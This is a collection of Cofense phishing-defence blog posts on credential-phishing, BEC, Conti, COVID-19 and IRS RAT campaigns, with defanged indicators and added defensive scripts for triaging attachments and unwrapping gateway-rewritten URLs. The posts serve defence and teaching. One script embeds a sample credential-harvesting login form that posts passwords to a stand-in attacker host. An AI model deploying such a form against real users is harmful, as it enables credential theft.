Energy/Infrastructure Enterprises Targeted by HTML Phishing Campaign

By Matthew Dortch, Cofense Phishing Defense Center

Commonly used yet still effective tactics are being exploited by threat actors to get phish into users’ email inboxes. The Cofense Phishing Defense Center (PDC) has observed a phishing campaign targeting energy/infrastructure companies using HTML attachments that contain credential-stealing forms. This is another example of how Cofense observes phishing campaigns across various customers and industries.

Figure 1: Email Body

The email shown in Figure 1 poses as a notification of a legitimately received file presented as a transcript. The threat actor leveraged a simple transcript alert theme. Specific details added to the email, such as the date and time the attachment was received, may boost the authenticity of the phish. To appear to come from an internal source, the threat actor spoofed the organization in the display name using “Shared-Files via ”; however, the actual sender address, on a Japanese domain, is still clearly displayed.

Figure 2: Phishing Page

After downloading and opening the HTML file, users are shown a Microsoft login form with a document displayed behind it, as shown in Figure 2. The document in the background appears to be an invoice containing financial information that can only be accessed by logging in with a Microsoft account. This tactic alone was most likely the indicator to the recipient that the email content did not align with what was being presented on the landing page, leading them to quickly report the suspicious email. The recipient’s email address is automatically displayed with only the password field left empty, because the threat actor scripted the HTML file to pass in the recipient’s email address.
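The traits described above (a password field, a pre-filled recipient address, and a form that posts to a server other than the brand it imitates) can be checked statically before anyone opens the attachment. The following triage script is an added example, not Cofense code; the sample attachment, the `.invalid` form action and the `LEGIT_LOGIN_HOSTS` allow-list are constructed for illustration.

```python
"""Static triage of an HTML attachment for credential-harvesting forms."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a Microsoft-styled login form whose action is a
# third-party PHP endpoint and whose email field is filled in by script.
SAMPLE_HTML = """
<html><body style="background:url(invoice.png)">
<form id="login" method="POST" action="https://example-attacker.invalid/scn/hope.php">
  <input type="email" name="login" value="" readonly>
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
  document.querySelector('[name=login]').value = "victim@example.com";
</script>
</body></html>
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
# Hosts a genuine Microsoft sign-in form would post to (assumed allow-list).
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class FormCollector(HTMLParser):
    """Collects every <form> with its <input> elements and inline scripts."""

    def __init__(self):
        super().__init__()
        self.forms = []        # dicts: action, method, inputs
        self.scripts = []      # bodies of inline <script> blocks
        self._in_script = False
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "GET").upper(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({k: (v or "") for k, v in a.items()})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> content to handle_data as raw text.
        if self._in_script:
            self.scripts.append(data)


def analyze_attachment(html: str) -> dict:
    """Return findings for forms that collect a password in this HTML."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    prefilled = set()
    for form in parser.forms:
        types = {i.get("type", "text").lower() for i in form["inputs"]}
        if "password" not in types:
            continue
        host = urlparse(form["action"]).hostname or ""
        if not host:
            findings.append("password form posts relative to the local file")
        elif host.lower() not in LEGIT_LOGIN_HOSTS:
            findings.append(f"password form posts to {host} ({form['method']})")
        for i in form["inputs"]:
            prefilled.update(EMAIL_RE.findall(i.get("value", "")))
    # A recipient address baked into script is the pre-fill trick described above.
    for script in parser.scripts:
        prefilled.update(EMAIL_RE.findall(script))
    if prefilled:
        findings.append(f"recipient address pre-filled: {sorted(prefilled)}")
    return {
        "suspicious": bool(findings),
        "findings": findings,
        "prefilled": sorted(prefilled),
        "actions": [f["action"] for f in parser.forms],
    }


if __name__ == "__main__":
    for line in analyze_attachment(SAMPLE_HTML)["findings"]:
        print(line)
```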

Because one of the customers hit by this campaign uses Cofense Vision to automatically quarantine emails, that customer was able to remove the email from 40 unique inboxes, reducing the risk of users interacting with it and giving away credentials.

Cofense continues to observe HTML / HTM attachments as the top attachment type making it to the inbox and leading to credential theft. Cofense Vision sits behind SEGs and offers an effective and unique phishing defense: a network of people reporting suspicious emails allows one reported email to be used to mitigate an attack across an entire organization. Reach out to learn more.

Indicators of Compromise
URL: hXXps://warrenlawomaha[.]com/scn/hope.php
IP: 103.125.218.44

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

BEC: CEO Gift Card Scams

Author: Tonia Dudley

Over the years we’ve seen the evolution of topics and content related to Business Email Compromise, CEO Fraud or whatever you want to label this category of phishing. We like to just call it what it is – conversational phishing – no links or attachments – just trying to get the recipient to interact in a conversation leading to a task. The threat actor is constantly adjusting their lure and context to avoid any AI/ML detection configuration. As of late their tactic is to quickly move the conversation to another communication channel – SMS or WhatsApp for example.

I was recently catching up with a friend and, as we were wrapping up our conversation, she said “oh, speaking of cybersecurity, I had this really strange email yesterday.” I knew exactly where she was going with this conversation and just allowed her to tell me her story. As you read her story, keep in mind that she is a C-Suite executive reporting directly to the CEO, and that she has only been in her role for a month. It went something like this:

As she was wrapping up her Friday, she did one last check of her email on another platform used by a peer organization. She saw an email from her CEO asking for her cell. At first glance, she knew he was on a personal vacation and thought maybe he had only taken his personal cell with him and didn’t have her cell phone number. She quickly reached out to her peer, but got no response – it was late Friday afternoon – nor did Mark respond when she texted him.

Figure 1: Phishing Email

Since she couldn’t get ahold of anyone to validate, she responded and began the text exchange in Figures 2-5. And then headed off to buy the requested gift cards. As you can see in the exchange, it’s clear she thought she was chatting with Mark and making every effort to meet the demands of the request. As she made the final step to text a picture of the code, she decided to do one last check with her CEO. It was then that she decided to try one last time to call him directly. He explained to her that he is on vacation and would never ask her to buy gift cards. While she had scratched off the cover to get the code – in the parking lot after making the purchase – she was able to walk back into the store and get a refund of her personal money.

Figure 2-5: SMS Message Exchange

In this scenario, Ruth was lucky to be able to get a refund for the purchase she had just made; many are not. Because the dollar amount of these losses tends to be low, very rarely are they reported to law enforcement.

In our Annual Report webinar series, we break down the various types of tactics seen in these scams and how these have evolved. We also cover some ways that you can protect your organization by making your employees aware of these tactics. On May 25, we will be providing in-depth insights on BEC and best practices on how to educate your employees to prevent situations like the above.

Cofense Annual Phishing Report Highlights 10 Point Increase in Credential Phishing

67% of all phishing emails observed are credential phishing; new report highlights ways that traditional technology can’t keep up with phishing tactics

March 30, 2022 08:30 AM Eastern Daylight Time

LEESBURG, Va.–(BUSINESS WIRE)–Cofense®, the leading provider of Phishing Detection and Response (PDR) solutions, today released its 2022 Annual State of Phishing Report, which sheds light on the value of human reporting and the downfall of relying too heavily on technology controls to prevent phishing. As observed by the Cofense Phishing Defense Center (PDC), phishing attacks containing malicious URLs were four times more likely to bypass secure email gateways than those with attachments.

Cofense has equipped more than 32 million people in organizations across the globe to report suspicious emails through Cofense Reporter™, an easy to use, one-click email toolbar button. As a result, Cofense has access to a dynamic and vast dataset of advanced phishing threat intelligence – with more visibility into the actionable phishing emails that are bypassing secure email gateways and hitting user inboxes than any other security company.

Key insights from Cofense’s research and analysis from 2021 include:

  • Credential phishing continues to be the top threat facing organizations, increasing 10 percentage points since 2020
    • 67% of all phishing emails observed are credential phishing
    • 52% of all credential phish were branded as Microsoft
  • Cofense observed nearly 100 unique malware families, representing the complicated landscape of distinct threats organizations need to keep up with
  • The healthcare industry continues to be the top target of business email compromise (BEC) attacks
    • 16% of malicious emails found in healthcare environments were BEC attacks
  • Threats continue to break through into environments protected by email security vendors
    • Of the Indicators of Compromise (IOCs) analyzed by Cofense’s Phishing Defense Center, 80% contained malicious URLs found in the body of the email, while 20% utilized nefarious attachments.
  • Organizations are increasingly aligning their employee simulation training with real threats known to be targeting their organization
    • Cofense saw a 7-point increase in simulations based on credential phishing in 2021

“Early on in our journey as a company, we grew our focus from solely security awareness simulation training to more broadly addressing the real phishing threats facing organizations. We knew solving these problems would require continuous innovation, and in 2021 we were proud to take our multi-layered email security architecture to a whole new level through the acquisition of Cyberfish and the launch of brand-new product capabilities,” said Aaron Higbee, co-founder and Chief Technology Officer, Cofense.

“If there is anything I hope the industry takes away from Cofense’s 2022 Annual State of Phishing Report, it is that threat actors are innovating but SEGs are not, and well-conditioned users report real phish. Cofense is the only email security company that detects phish that have bypassed all major SEG vendors. I believe the number of real phish, reported by real users, found in all major SEG environments speaks for itself,” added Higbee.

Report Available Now

To download the Cofense Annual State of Phishing Report, or to register for the free Cofense webinar taking place today, March 30 at 1 pm ET, visit https://cofense.com/annualreport.

About Cofense

Cofense® is the leading provider of phishing detection and response solutions. Designed for enterprise organizations, the Cofense Phishing Detection and Response (PDR) platform leverages a global network of over 32 million people actively reporting suspected phish, combined with advanced automation to stop phishing attacks faster and stay ahead of breaches. When deploying the full suite of Cofense solutions, organizations can educate employees on how to identify and report phish, detect phish in their environment and respond quickly to remediate threats. With seamless integration into most major TIPs, SIEMs, and SOARs, Cofense solutions easily align with existing security ecosystems. Across a broad set of Global 1000 enterprise customers, including defense, energy, financial services, healthcare and manufacturing sectors, Cofense understands how to improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Phishing Takeaways from the Conti Ransomware Leaks – Part 1

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 1, we discuss the background of the leaks, Conti’s segmentation of the attack chain, and how Conti operators use OSINT to select and harass their targets.

Background

A day after Russia began air strikes and a ground invasion of Ukraine, Conti posted a statement of support for Russia on its public website. Although the group attempted to distance itself from the Russian government, the statement threatened retaliation if Western entities “attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.” Two days later, an anonymous pro-Ukraine Twitter account published a large “leak” of Conti’s internal documentation, program code, and chat logs involving Conti operators and their associates. The leaked chats include Conti’s private Jabber and Rocket Chat instances, as well as chat logs from the TrickBot forums. They span most of Conti’s history, with logs from June to November 2020 and from January 2021 to March 2022. We examined the leaked information and identified several key takeaways for the phishing threat landscape.


“ContiLeaks” tweets supporting Ukraine and posting a batch of leaked files.

Conti Intensely Favors Segmentation of the Attack Chain

In September 2021 we published a Strategic Analysis report to Cofense Intelligence customers, showing the significance of phishing and intermediate malware in ransomware attacks. Successful ransomware groups choose not to expend resources on scattered campaigns limited to encrypting only individual workstations that belong to individually compromised victims. Instead, they prefer to carefully select ransomware targets from organizations that have been compromised through phishing attacks against individual employees, or that can be compromised by other intrusion methods. They use any footholds in a network to perform reconnaissance and evaluate the viability and value of a target. If the effort seems to be worthwhile, they perform lateral movement to maximize the volume of data and systems they can ransom.

The Jabber chat leaks show that the Conti threat group fully embraced this approach. Reconnaissance experts associated with the group search for companies with indications of revenue exceeding a certain threshold and identify individual targets. For initial exploitation, they pay operators of other malware like TrickBot and Emotet to conduct phishing campaigns and establish footholds in the target organization. Conti managers distribute those footholds to a team of hackers who specialize in expanding access in remote networks and locating valuable data.

Beyond using specialists for each stage of attack, Conti’s leadership showed willingness to pay for sophisticated tools. They gave their reconnaissance staff access to business information services like ZoomInfo, SignalHire, and Crunchbase Pro. Their extensive work with TrickBot eventually led them to absorb its developers into their own team, and they influenced Emotet’s return to action after its 2021 takedown by law enforcement. For their intrusion team, they illicitly acquired access to Cobalt Strike licenses. The investments appear to have paid off: according to blockchain analysis group Chainalysis, Conti’s cryptocurrency revenue in 2021 alone was estimated at $180 million.

Conti Uses OSINT Research for Both Target Selection and Harassment

Conti’s OSINT researchers play an important role during multiple stages of an attack. Before infection, they help to identify target organizations (ones that are likely to be willing and able to pay large ransoms). Team members aggregate data from a variety of sources in order to present summaries, including company contact information, social media pages, industry, revenue, number of employees, and even website popularity ranking. For targeted organizations, they find contact information for potential phishing victims.

Once the ransomware has been successfully deployed and a victim organization has contacted Conti, the researchers identify influential figures associated with the company as targets for harassment. Conti’s negotiators reach out to these people to apply additional pressure to pay the ransom. In one case, a researcher listed two directors and two vice presidents within a victim organization, including multiple phone numbers for each one, and notes from the first time they had attempted to call. To create more pressure in instances where companies refuse to negotiate, the researchers go outside the organization and identify board members or investors as targets.

Stay tuned for Part 2, which covers Conti’s collaborations with other malware operators.

Cofense Named to JMP Securities Elite 80 List of Hottest Cybersecurity Companies

Cofense was recently included in the JMP Securities Elite 80, a list of the hottest privately held cybersecurity and IT infrastructure companies in 2022. We are proud to have been featured on this list each of the last 4 years, during a time in which our company has evolved profoundly – both our overall brand, and the technology solutions we bring to market.

As noted by the JMP Securities Elite 80 authors, “A key theme that became apparent in the pandemic was that the role of IT infrastructure and cybersecurity have rapidly grown more critical and fast changing. Given the rapid paradigm shift in the way that society is adopting new technologies, we believe the competitive advantage of being a nimble and innovative technology vendor is even more powerful than in the past.”

At Cofense, we couldn’t agree more. Innovation is core to our mission, and continues to be a driving force for significant product and service updates.

Early on in our journey as a company, we grew our focus from solely security awareness simulation training to more broadly addressing the real phishing threats facing organizations. In early 2018, 10 years after our co-founders first registered the company domain with GoDaddy, we rebranded from PhishMe to Cofense. Fast forward to 2021, we recognized that solving the problems we originally set out to address would require continuous innovation. As a result, we were proud to take our multi-layered email security architecture to a whole new level through the acquisition of Cyberfish and the launch of brand-new product capabilities.

Today, Cofense has equipped more than 32 million people in organizations across the globe to report suspicious emails through Cofense Reporter™, an easy to use, one-click email toolbar button that gives Cofense access to a vast dataset of advanced phishing threat intelligence and more visibility into the actionable phishing emails that are bypassing secure email gateways (SEGs) and hitting user inboxes than any other security company.

“Every day, our team analyzes real phish that land in the inboxes of real people, and we are able to back up what we believe wholeheartedly – which is that conditioned users report real phish. We recently published our 2022 Annual State of Phishing Report, which sheds light on the value of human reporting and the downfall of relying solely on technology controls to prevent phishing. We are committed to helping organizations succeed at a layered phishing defense strategy that encompasses machine learning and crowd-sourced human intelligence for defending against the threats that continue to adapt,” said Cofense co-founder and CEO, Rohyt Belani.

The full Elite 80 report from JMP Securities highlights some of the most interesting and strategically positioned private companies in the industry. “We are honored to be listed among these other cybersecurity brands in the 2022 Elite 80, and look forward to the strides our industry will make in 2022,” added Belani.

Cofense Triage and Vision Updates Bring a Double Dose of Efficiency Improvements to Email Security

Technology isn’t perfect – emails are going to get past existing controls like secure email gateways (SEGs) and make it into the inboxes of unsuspecting employees. It’s then up to operations and response teams to quickly validate and prioritize malicious emails, and ultimately remove those threats from the inbox. With Cofense Triage and Cofense Vision, organizations complete processes in minutes that previously took days or even weeks. This week, we’re giving organizations multiple reasons to celebrate, as both Triage 1.24 and Vision 2.2 are now available and introducing the following new capabilities:

  • Playbooks in Triage to bring automation of workflows to new heights
  • Triage Tag Manager simplifies the auditing and clean-up of existing tags
  • Ensure full organization-wide quarantine is successful with expanded URL unwrapping support in Vision

Keep reading to learn more!

Let’s start with Triage.

Introducing Playbooks: Supercharging Automation in Triage

Cofense Triage 1.24 is building the framework for an improved way to implement and manage automated workflows. Over the next few months, current methods for handling repeatable processes in Triage will be replaced with a more efficient and robust way of automating processes and communication related to email security using Playbooks.

With the release of Playbooks in Triage 1.24, the following processes can now be completed with the click of a button:

  • communicate across multiple teams with different notifications and messages
  • categorize reported emails based on specific characteristics
  • remove existing tags and add new ones for better grouping and organization
  • send personalized responses to different reporter groups – including VIPs that may exist such as executives or high target individuals

With Playbooks, set up automated workflows that can turn follow-up for specific attack types into easily repeatable processes.

Easily Categorize and Navigate Through Related Material in Triage with a Robust Tag Manager

From a single location, manage the tags you’re applying to reports, related reported emails, and comments left on reports and threat indicators. On this page you can see how many times (and where) a tag is used, regardless of its context in Triage, allowing you to identify trends and popular topics. You can also rename, merge, and delete tags. And don’t worry: everything is documented, as it should be, in an audit log so you can keep a close eye on changes.

Time to move onto some exciting Vision updates.

Vision Adds Expanded Support for URL Wrappers for More Effective Search and Quarantine

Email security controls like SEGs rewrite most of the URLs sent via email to the inboxes they protect, redirecting the user through the vendor’s own trusted server so the gateway has time to evaluate whether the URL is malicious. This can be problematic, because wrapped malicious links are much harder for the user to identify. Users are trained to spot URLs that don’t lead where they should, but when every URL is dominated by the SEG domain (‘vendorname.com’, for example) it becomes increasingly difficult to pick out the nefarious links, because everything looks similar and safe.

Furthermore, when a URL is determined to be malicious post-gateway, the next step is to pull it out of every inbox it is sitting in. Pulling out wrapped, rewritten URLs can be tricky because they don’t match the identified malicious URL on a plain string comparison.
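To see why a quarantine search has to unwrap before it compares, here is an added example (not Cofense Vision code) that normalizes two common wrapper formats and matches the result against a known-bad URL. The decoding rules are assumptions drawn from the publicly observed formats, not from this post: Safe Links carries the destination in the `url` query parameter, and Proofpoint URL Defense v2 carries it in `u` with '/' written as '_' and other reserved bytes as '-XX' hex. All sample links and the `.invalid` IOC are constructed.

```python
"""Unwrap SEG-rewritten URLs before matching them against a known-bad URL."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed IOC and constructed candidate links as they would appear
# in mailboxes protected by different gateways.
IOC = "https://malicious.example.invalid/scn/hope.php"
SAMPLE_URLS = [
    # Microsoft Safe Links wrapper (destination percent-encoded in `url`)
    "https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2F"
    "malicious.example.invalid%2Fscn%2Fhope.php&data=constructed&reserved=0",
    # Proofpoint URL Defense v2 wrapper (assumed '_' -> '/', '-XX' -> byte)
    "https://urldefense.proofpoint.com/v2/url?u=https-3A__malicious.example."
    "invalid_scn_hope.php&d=DwMFaQ&c=x&r=y&m=z&s=w&e=",
    # Unwrapped copy (no gateway rewriting on this mailbox)
    "https://malicious.example.invalid/scn/hope.php",
    # Benign link wrapped by Safe Links; must not be quarantined
    "https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2F"
    "www.example.com%2F&data=constructed",
]


def _decode_proofpoint_v2(encoded: str) -> str:
    """Reverse the assumed v2 encoding: '_' is '/', '-XX' is a hex byte."""
    s = encoded.replace("_", "/")
    return re.sub(r"-([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def unwrap(url: str) -> str:
    """Return the destination behind a recognised wrapper, else the URL itself."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    qs = parse_qs(p.query)  # parse_qs already percent-decodes values
    if host.endswith(".safelinks.protection.outlook.com") and "url" in qs:
        return unwrap(qs["url"][0])  # wrappers can nest, so recurse
    if host == "urldefense.proofpoint.com" and "u" in qs:
        if p.path.startswith("/v2/"):
            return unwrap(_decode_proofpoint_v2(qs["u"][0]))
        if p.path.startswith("/v1/"):
            return unwrap(qs["u"][0])  # v1 carries the plain URL (assumed)
    return url


def normalize(url: str) -> str:
    """Canonical form for comparison: unwrapped, lower-cased scheme and host."""
    p = urlparse(unwrap(url))
    host = (p.hostname or "").lower()
    path = p.path or "/"
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.lower()}://{host}{path}{query}"


def matches_ioc(candidate: str, ioc: str) -> bool:
    return normalize(candidate) == normalize(ioc)


def find_quarantine_targets(urls, ioc):
    """Return the links that resolve to the IOC once wrappers are removed."""
    return [u for u in urls if matches_ioc(u, ioc)]


if __name__ == "__main__":
    for u in find_quarantine_targets(SAMPLE_URLS, IOC):
        print("quarantine:", u)
```

A plain string comparison against `IOC` would match only the third sample; unwrapping first matches all three malicious copies and leaves the benign wrapped link alone.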

Vision 2.2 enables more thorough search and quarantine operations by adding support for URLs wrapped by the following providers:

  • Barracuda
  • FireEye
  • Proofpoint v3
  • Safe Links (Expanded Servers)
  • Zix (AppRiver/Edgepilot)

These providers join a growing list of others which Vision now offers URL Wrapping support for:

  • Cisco IronPort
  • Click Time
  • Mittum
  • Proofpoint v1 and v2
  • Safe Links

What’s mentioned above are just some of the highlights of these exciting product releases. To learn more about these and other capabilities and to see Triage or Vision in action, request a live demonstration today.

If you’re an existing Cofense operator, please reach out to your dedicated customer experience representative for more information.

Three Highlights from the Cofense 2022 Annual State of Phishing Report

Author: Tonia Dudley

I hope by now you’ve had a chance to download our Annual State of Phishing Report and listen to our webinar discussing the highlights. If not, you can still download it and even sign up for one of our subsequent webinars highlighting key topics over the following months. A key theme you will see throughout this report is that threat actors are still finding ways to get past your Secure Email Gateway (SEG) and land in your users’ inboxes, as evidenced by the graph below. This leads to the ultimate question: are your users prepared?

Key Takeaway #1: Credentials are in high demand.

As organizations continue to move to a cloud-first strategy, it’s not surprising that we saw a 10-percentage-point increase over the previous year for credential phish. Even more concerning, the number one brand leveraged in credential phish is Microsoft. Just as your users have figured out what alerts to expect when interacting with your Microsoft services, so too have the threat actors. Microsoft has made it clear that enabling Multifactor Authentication (MFA) significantly mitigates this threat. Full enterprise deployment can be complex and time consuming, so take the time to prioritize your high-risk targets such as finance teams.

Key Takeaway #2: BEC didn’t improve.

When it comes to Business Email Compromise (BEC), we also saw an increase overall moving from 6% to 7% this year. We also see that the Healthcare industry still takes the lead at 17% of their reported emails categorized as BEC. When it comes to tactics used in this category, we observed direct deposit, gift cards and invoice scams. We’ll dig deeper into this in an upcoming webinar, but in the meantime, a simple message from your CEO to everyone in the organization – “I will never send you an email to go buy gift cards” is a great start!

Key Takeaway #3: Well-conditioned Users are Prepared!

When it comes to preparing your users for phish hitting their inbox, we saw a two-point increase in resiliency rate for simulation campaigns. What was even more exciting was to see organizations that have full phishing defense programs show a seven-point resiliency rate. It was also great to see that our PhishMe operators took notice of the current threat and used credential phishing in the campaign scenarios.

As you can see from the highlights above, phishing is not going anywhere. In fact, it’s quite the opposite; it’s only getting worse. Threat actors are continuing to use emerging tactics and techniques to bypass traditional email security solutions and the only way to stay ahead of the curve is to have a comprehensive phishing defense strategy. If you’re interested in a more detailed analysis of SEG effectiveness, BEC insights or catching ransomware at the phishing stage, sign up for our upcoming webinars.

COVID-19 Phish Targeting Companies

By Jer O’Donovan, Cofense Phishing Defense Center

COVID-19 has become an ever-present topic in our lives since the start of 2020. With this we’ve seen threat actors leveraging the pandemic with themes related to remote working, vaccination status, and back to the office surveys or general updates. This is on top of their usual business communications such as Microsoft Teams messages, deadline reminders, internal policy updates and more.

The Cofense Phishing Defense Center (PDC) has observed a phishing campaign in which threat actors impersonate companies to send out fake COVID-19 forms. In Figure 1 we see a phish masquerading as a general office-wide email claiming that someone in the building has been infected with COVID-19 and asking the recipient to review the company policy.

Threat actors sometimes use legitimate but compromised email addresses to send out such phishing emails. In this case, searching the sender domain led us to a real German furniture store. They spoofed the display name as “Human Resources” so the recipient would assume it’s legitimate.

Figure 1: Initial Email

The content of the email is professionally presented. The threat actor has purposely used generic language throughout, such as “Dear Colleagues” and “Human Resources”, and omitted company logos. They also used “COVID-19 Positive Case-IMPORTANT” as the subject to grab attention.

All these tactics are used to convince the employee that it’s a legitimate mail. The generic language also indicates that this is a mass email campaign sent to many companies, since it doesn’t need to be tailored to each one.

Once the link is clicked, the user is taken to a Typeform page that prompts for their email address, as seen in Figure 2. Typeform is an online form-building and survey service. Threat actors frequently use such services because a phishing form can be set up quickly and easily.

Figure 2: Initial Phishing Landing Page

Once the email address is submitted, the user is prompted for their password, as seen in Figure 3.

Figure 3: Password Entry Form

The PDC also observed another COVID-19 related phishing campaign from the same sender asking the user to update their vaccination status. Instead of Typeform, the threat actor used Wufoo, another online form builder, to harvest the user’s information, as seen in Figure 4. That form has since been taken down.

Figure 4: Second Phishing Campaign

Figure 5: Fake Covid-19 Policy

If an employee were to fall for this phish, the web page would redirect seamlessly to a compromised SharePoint site hosting a fake COVID-19 policy, as seen in Figure 5, thereby deflecting suspicion. We have noticed across various types of phishing attempts that threat actors redirect to seemingly non-malicious pages after the user has entered their details; sometimes the redirect targets are legitimate sites such as Microsoft’s.

For endpoint and email security teams, blocking a malicious sender address is not always appropriate. That is the case with this sender address: the account was compromised rather than attacker-owned, and legitimate communication with it will need to continue once it has been secured.

Indicators of Compromise (IOCs) | IP
hXXps://5g3poiiecwg[.]typeform[.]com/acknowledgement | 104.18.26.71, 104.18.27.71
hXXps://andy11[.]wufoo[.]com/forms/z1mh5ftj1a0115p/ | 18.67.65.39, 18.67.65.38

Malicious emails like this are on the rise, and it is imperative that businesses are made aware of them so that they can put procedures in place to stop these kinds of threats. With Cofense tools and services, malicious emails can be identified and indicators of compromise (IOCs) shared. Find out what we can do for your enterprise.


RAT Campaign Looks to take Advantage of the Tax Season

By Kyle Duncan and Dylan Main, Cofense Phishing Defense Center

Tax season can be a stressful time for many people, and it comes as no surprise that every year threat actors look to capitalize on this by using a variety of new tactics to exploit their targets’ accounts and systems. Some of these campaigns are rather simple and easy-to-spot phish, while others are carefully designed with more thought put into them. The Phishing Defense Center (PDC) has identified one such campaign that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages NetSupport Manager, a troubleshooting and screen-control program, as a malicious remote access trojan (RAT) that the threat actor employs to remotely enter user systems. The PDC has seen tax-related campaigns in the past that were used to steal employee credentials; however, this attack is unique in that it installs malware.


Figure 1: Email Body

In Figure 1, the threat actor is attempting to impersonate an IRS audit request for a new federal law affecting U.S.-based companies. The email prompts users to click the button to fill out “Form 4721” and update their company’s assets for tax purposes. While the IRS does require Form 4720 for certain excise taxes on charities, Form 4721 doesn’t actually exist. The email body appears to be well designed, but the sender’s email address is hosted in Brazil and is not likely to be used by the IRS for official communication. Both of these indicators were spotted by a well-conditioned user who quickly reported the email. Once a user interacts with the email, they are redirected to a captcha page at hXXps://irsbusinessaudit[.]net/captcha.php.


Figure 2: Captcha Page

As seen in Figure 2, users are prompted to enter a three-digit code to access the form. When “continue” is clicked, an XLL file is downloaded. Unlike ordinary Excel workbooks, XLL files are compiled add-ins that Excel loads as native code, and companies use them to extend Excel’s functionality. In this case, the XLL file reaches out to a second directory on the irsbusinessaudit[.]net domain and downloads a ZIP file named “DROP.zip.” The contents of the ZIP file are not executed automatically once downloaded; further interaction from the user is required.


Figure 3: ZIP File

The contents of the ZIP file, seen in Figure 3, include all the components needed to run NetSupport Manager, an application typically used to give remote access to another machine. The main executable in the ZIP, client32[.]exe, was created just like any NetSupport binary and, once launched, checks its location via NetSupport Manager’s geolocation services. A connection is then established with a threat actor-owned command-and-control (C2) server instead of a legitimate IT service, giving the threat actor remote access to the now-infected machine.
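The delivery chain above hinges on two attachment types that deserve special handling at the mail gateway or in SOC triage: an XLL add-in (a Windows PE image that Excel loads as native code) and a ZIP archive carrying an executable. The script below is an added example for this page, not Cofense code or a feature of any Cofense product, showing how to triage such attachments by extension and file magic rather than by name alone. The XLL filename, the in-memory stand-in for DROP.zip and the fake PE payload are all constructed here; the only names taken from the post are DROP.zip, client32.exe and Form 4721.

```python
import io
import zipfile
from pathlib import PurePosixPath

PE_MAGIC = b"MZ"            # DOS header present in every Windows PE image, XLL add-ins included
ZIP_MAGIC = b"PK\x03\x04"   # local file header that opens a ZIP archive
EXEC_EXTENSIONS = {".exe", ".dll", ".xll", ".scr", ".com"}


def is_pe(data: bytes) -> bool:
    """True if the blob starts with the PE/DOS 'MZ' signature."""
    return data[:2] == PE_MAGIC


def triage_attachment(filename: str, data: bytes) -> list[str]:
    """Return a list of findings for one attachment; an empty list means nothing notable."""
    findings = []
    ext = PurePosixPath(filename.lower()).suffix

    if ext == ".xll":
        # XLL add-ins are DLLs: Excel runs their native code on load, unlike a workbook.
        findings.append("XLL add-in: native code that Excel loads like a DLL")
        if not is_pe(data):
            findings.append("XLL body is not a PE image (corrupt or disguised)")
    elif is_pe(data) and ext not in EXEC_EXTENSIONS:
        # Executable content hiding behind a document-style extension.
        findings.append(f"PE executable disguised with '{ext or 'no'}' extension")

    if ext == ".zip" or data[:4] == ZIP_MAGIC:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for member in archive.infolist():
                    if member.is_dir():
                        continue
                    member_ext = PurePosixPath(member.filename.lower()).suffix
                    with archive.open(member) as fh:
                        head = fh.read(2)   # only the magic is needed to classify the member
                    if member_ext in EXEC_EXTENSIONS or head == PE_MAGIC:
                        findings.append(f"archive member {member.filename} is executable")
        except zipfile.BadZipFile:
            findings.append("ZIP extension but not a valid archive")

    return findings


def build_sample_drop_zip() -> bytes:
    """Constructed stand-in for DROP.zip: a fake PE named client32.exe plus a text file.
    The 'executable' is just an MZ header with padding, not a real binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("client32.exe", PE_MAGIC + b"\x90" * 62)
        archive.writestr("readme.txt", "placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples; the XLL name mirrors the non-existent "Form 4721" lure.
    samples = [
        ("Form_4721.xll", PE_MAGIC + b"\x00" * 62),
        ("DROP.zip", build_sample_drop_zip()),
        ("statement.pdf", b"%PDF-1.4 constructed\n"),
    ]
    for name, blob in samples:
        print(name, "->", triage_attachment(name, blob) or ["clean"])
```

The check on the archive member's first two bytes matters because a renamed executable inside a ZIP keeps its MZ header even when its extension has been changed; matching on extension alone would miss it.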

With tax season in full swing, sophisticated campaigns like this are dangerous to individuals as well as entire corporations. Remote access tools can be helpful, but when used for nefarious purposes they are extremely dangerous. Threat actors are constantly changing their tactics so that malware can reach your users’ inboxes, even with a secure email gateway (SEG) installed and configured. Cofense products allow you to quickly mitigate malicious emails that find their way to users’ inboxes. With Cofense Managed Phishing Detection and Response, enterprises get our full view of phishing attacks. Contact us to learn more.

Indicators of Compromise | IP
hXXps://irsbusinessaudit[.]net/captcha.php | 185.225.19.116
